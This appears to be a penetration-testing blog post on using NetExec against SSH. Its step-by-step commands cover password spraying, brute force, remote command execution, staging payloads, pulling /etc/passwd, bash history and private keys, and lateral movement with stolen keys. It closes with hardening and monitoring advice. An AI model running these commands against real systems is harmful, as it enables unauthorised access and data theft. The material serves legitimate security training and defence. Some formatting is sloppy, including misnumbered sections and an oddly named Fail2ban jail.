NXC for Pentester: SSH Exploitation – The Red Team’s Swiss Army Knife for Credential Spraying, Remote Command Execution, and Silent Data Exfiltration + Video

Listen to this Post

🐢▶️ Listen🚀

Introduction:

Secure Shell (SSH) is the backbone of Linux remote administration, yet weak credentials and misconfigurations remain the Achilles’ heel of enterprise security. The NetExec framework (NXC), the community-driven successor to CrackMapExec, equips penetration testers with a unified interface to validate credentials, execute commands, and transfer files across SSH, SMB, LDAP, and WinRM, automating the initial foothold to lateral movement chain.

Learning Objectives:

• Master credential spraying and brute-force attacks against SSH services using NXC.
• Execute remote system commands and perform silent file exfiltration over SSH.
• Implement defensive hardening measures including key-based authentication, Fail2ban, and MITRE ATT&CK-aligned monitoring.

You Should Know:

1. NetExec Arsenal: Credential Spraying and Brute Force

NetExec transforms password guessing from a noisy, slow process into a surgical, high-speed operation. Attackers rarely target a single account; they spray one or two common passwords across hundreds of usernames to avoid lockouts. The `nxc ssh` module automates this against SSH targets.

Step‑by‑Step Guide:

• Installation (Kali Linux):
  `sudo apt update && sudo apt install netexec -y`

Alternative pipx install:

`sudo apt install pipx git && pipx install git+https://github.com/Pennyw0rth/NetExec.git`

• Manual Build (for latest features):

  git clone https://github.com/Pennyw0rth/NetExec.git
  cd NetExec
  virtualenv env && source env/bin/activate
  pip install pyinstaller . && pyinstaller netexec.spec
  ./dist/nxc
  

On Windows: use `env\Scripts\activate` and `./dist/nxc.exe`

• Credential Spraying (one password against many usernames):

`nxc ssh 192.168.1.52 -u users.txt -p ‘Spring2025!’`

This tests the same password across all listed usernames, minimizing lockout risk.

• Brute Force (multiple passwords against multiple usernames):

`nxc ssh 192.168.1.0/24 -u admin.txt -p passwords.txt –continue-on-success`

The `–continue-on-success` flag ensures the scan doesn’t stop after finding one valid credential.

• Validate Discovered Credentials:

`nxc ssh 192.168.1.52 -u ignite -p ‘123’`

Single-login attempt removes false positives and confirms a working access vector.

Pro Tip: Use the `nxc_bruter` Bash utility to loop through service lists and pass credential files directly to NXC. It supports NTLM hashes and Kerberos tickets, enabling Pass-the-Hash attacks across SMB, SSH, and WinRM.

2. Remote Command Execution and Post-Exploitation Recon

Once NXC validates SSH credentials, the true power emerges: executing arbitrary commands on the remote system without interactive login. This enables deep system enumeration, persistence installation, and lateral movement preparation.

Step‑by‑Step Guide:

• Execute a Single Command:
  `nxc ssh 192.168.1.52 -u ignite -p ‘123’ -x ‘id && hostname && whoami’`
  The `-x` parameter runs the command on the remote target. This example quickly identifies user privileges, system name, and current user context.

• Run a Script Over SSH:
  Create a local script `enum.sh` and execute it remotely:
  `nxc ssh 192.168.1.52 -u ignite -p ‘123’ -X enum.sh`
  The `-X` flag uploads and executes the script in one atomic operation.

• Enumerate Network Configuration:
  `nxc ssh 192.168.1.52 -u ignite -p ‘123’ -x ‘ifconfig -a && netstat -tulpn | grep LISTEN’`
  This reveals active network interfaces and listening ports, mapping the attack surface for lateral movement.

• Collect System Information:
  `nxc ssh 192.168.1.52 -u ignite -p ‘123’ -x ‘cat /etc/os-release; uname -a; ps aux’`
  Gathers OS version, kernel details, and running processes, identifying potential privilege escalation vectors.

• Windows Target via SSH (if OpenSSH server is installed):
  `nxc ssh 192.168.1.100 -u administrator -p ‘Pass123’ -x ‘systeminfo | findstr /B /C:”OS Name” /C:”OS Version”‘`

  Mitigation: Disable password authentication entirely in `/etc/ssh/sshd_config` by setting `PasswordAuthentication no` and ChallengeResponseAuthentication no. Use SSH key pairs with strong passphrases, and consider implementing `sshd_config` AllowUsers and `DenyUsers` directives to restrict login by user or group.

1. File Transfer: Uploading Payloads and Exfiltrating Sensitive Data

File transfer over SSH is often an afterthought, but NetExec makes it a first-class operation. Attackers use encrypted SSH channels to stage malicious tools, exfiltrate password files, and pivot between hosts while staying under the radar.

Step‑by‑Step Guide:

• Upload a Tool to the Target:
  `nxc ssh 192.168.1.52 -u ignite -p ‘123’ –put-file /tmp/linpeas.sh /tmp/linpeas.sh`
  The `–put-file` parameter transfers a local file to the remote system. This is ideal for staging privilege escalation scanners like LinPEAS or reverse shell payloads.

• Download Sensitive File from Target:
  `nxc ssh 192.168.1.52 -u ignite -p ‘123’ –get-file /etc/passwd /home/attacker/passwd_exfil.txt`
  The `–get-file` parameter retrieves a remote file. `/etc/passwd` is a classic target for user enumeration, but attackers also grab SSH private keys (~/.ssh/id_rsa), configuration files, and database dumps.

• Exfiltrate Multiple Files Using Wildcards:
  `nxc ssh 192.168.1.52 -u ignite -p ‘123’ -x ‘tar czf /tmp/configs.tgz /etc/nginx /etc/apache2’`

First compress the target directory, then download:

`nxc ssh 192.168.1.52 -u ignite -p ‘123’ –get-file /tmp/configs.tgz /home/attacker/configs.tgz`

– Cross-Protocol File Transfer:
NXC unifies syntax across protocols: the same `–put-file` and `–get-file` flags work for SMB, FTP, NFS, and MS-SQL. Attackers pivot from SSH to SMB to exfiltrate data without switching tools.

Defensive Controls:

• Monitor SSH logs for repeated `–get-file` operations on sensitive paths (/etc/shadow, .ssh/, /var/backups).
• Implement file integrity monitoring (AIDE, Tripwire) to detect unauthorized file transfers.
• Restrict SFTP/SCP access via `sshd_config` Subsystem sftp internal-sftp and `ChrootDirectory` directives.

4. Post‑Access Reconnaissance and Privilege Escalation

After gaining initial access, attackers systematically enumerate the system for misconfigurations, credential caches, and network trust relationships. NXC’s modular architecture integrates with common post‑exploitation frameworks.

Step‑by‑Step Guide:

• Enumerate Sudo Privileges:
  `nxc ssh 192.168.1.52 -u ignite -p ‘123’ -x ‘sudo -l’`
  Identifies commands the user can run with elevated privileges without a password.

• Check for World‑Writable Files with SUID Bit:
  `nxc ssh 192.168.1.52 -u ignite -p ‘123’ -x ‘find / -perm -4000 -type f 2>/dev/null’`
  SUID binaries are common privilege escalation vectors; attackers look for misconfigured or vulnerable executables.

• Harvest SSH Keys from User Homes:
  `nxc ssh 192.168.1.52 -u ignite -p ‘123’ -x ‘find /home -name “id_rsa” -o -name “id_dsa” 2>/dev/null’`
  Stolen SSH keys enable lateral movement to other systems where the key owner has access.

• Extract Bash History:
  `nxc ssh 192.168.1.52 -u ignite -p ‘123’ –get-file ~/.bash_history /tmp/bash_history.txt`
  Command history often contains plaintext passwords, internal hostnames, and database connection strings.

Lateral Movement Example:

After harvesting an SSH key from `~/.ssh/id_rsa` on the first host, use it to authenticate to a second host:
`nxc ssh 192.168.1.53 -u sameuser –key-file ~/.ssh/id_rsa -x ‘whoami’`
This bypasses password authentication entirely and often goes undetected by traditional logging.

5. Hardening SSH Against NetExec and Automated Attacks

Defenders must assume attackers possess tools like NXC. Proactive hardening significantly raises the cost of compromise.

Step‑by‑Step Guide:

• Disable Password Authentication (Ubuntu/Debian/CentOS):

Edit `/etc/ssh/sshd_config`:

PasswordAuthentication no
ChallengeResponseAuthentication no
PermitRootLogin prohibit-password

Then restart SSH: `sudo systemctl restart sshd`

• Install and Configure Fail2ban:

  sudo apt install fail2ban -y
  sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local
  

Edit `jail.local` and add:

[bash]
enabled = true
port = ssh
maxretry = 3
bantime = 3600
findtime = 600

Then restart: `sudo systemctl restart fail2ban`

• Change Default SSH Port (obscurity, not security, but reduces automated scans):

In `/etc/ssh/sshd_config`: `Port 2222`

Update firewall rules and Fail2ban accordingly.

• Implement Firewall Rate Limiting (using iptables):

  sudo iptables -A INPUT -p tcp --dport 22 -m conntrack --ctstate NEW -m recent --set
  sudo iptables -A INPUT -p tcp --dport 22 -m conntrack --ctstate NEW -m recent --update --seconds 60 --hitcount 4 -j DROP
  

  This drops connections exceeding 4 attempts in 60 seconds.

• Use SSH Key Whitelisting:
  Restrict which keys can authenticate via `~/.ssh/authorized_keys` command= and `from=` restrictions. For example:

`from=”192.168.1.0/24″,command=”/usr/bin/rsync –server –sender -v . /” ssh-rsa AAAAB3…`

• Monitor with Auditd:

  sudo auditctl -w /etc/ssh/sshd_config -p wa -k ssh_config_change
  sudo auditctl -w /var/log/auth.log -p r -k ssh_auth_log
  

What Undercode Say:

• Credential hygiene remains the weakest link. Even with perfect SSH configuration, reused or weak passwords render all other defenses moot. NXC demonstrates how quickly an attacker can validate and weaponize leaked credentials.
• Automated tools shift the defender’s calculus. Traditional log monitoring fails against low-and-slow credential spraying. Defenders must implement account lockout policies, geofencing, and behavioral analytics to detect NXC-like patterns.
• File transfer over SSH is a blind spot. Most organizations monitor web and email exfiltration but overlook encrypted SSH channels. Inline SSH inspection proxies or endpoint detection solutions are critical to catch `–get-file` operations on sensitive data.
• MITRE ATT&CK provides a common language. Mapping NXC techniques to T1078 (Valid Accounts), T1021.004 (Remote Services: SSH), and T1105 (Ingress Tool Transfer) enables purple team exercises and measurable security improvements.
• Layer your defenses. No single control stops a determined attacker. Combine key-based authentication, Fail2ban, port knocking, micro-segmentation, and continuous monitoring to frustrate NXC-based attacks.

Prediction:

As SSH remains the default remote access protocol for Linux and cloud workloads, credential abuse will continue to dominate initial access vectors. NetExec and similar frameworks will evolve to integrate AI-driven password guessing, automate lateral movement across hybrid cloud environments, and bypass advanced logging via SSH tunneling. Defenders will shift toward zero-trust models, ephemeral SSH certificates, and continuous authentication—rendering long-lived credentials obsolete within 24–36 months. Organizations that fail to move beyond password-based SSH authentication will face inevitable compromise, not if, but when.

▶️ Related Video (64% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Nxc For – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky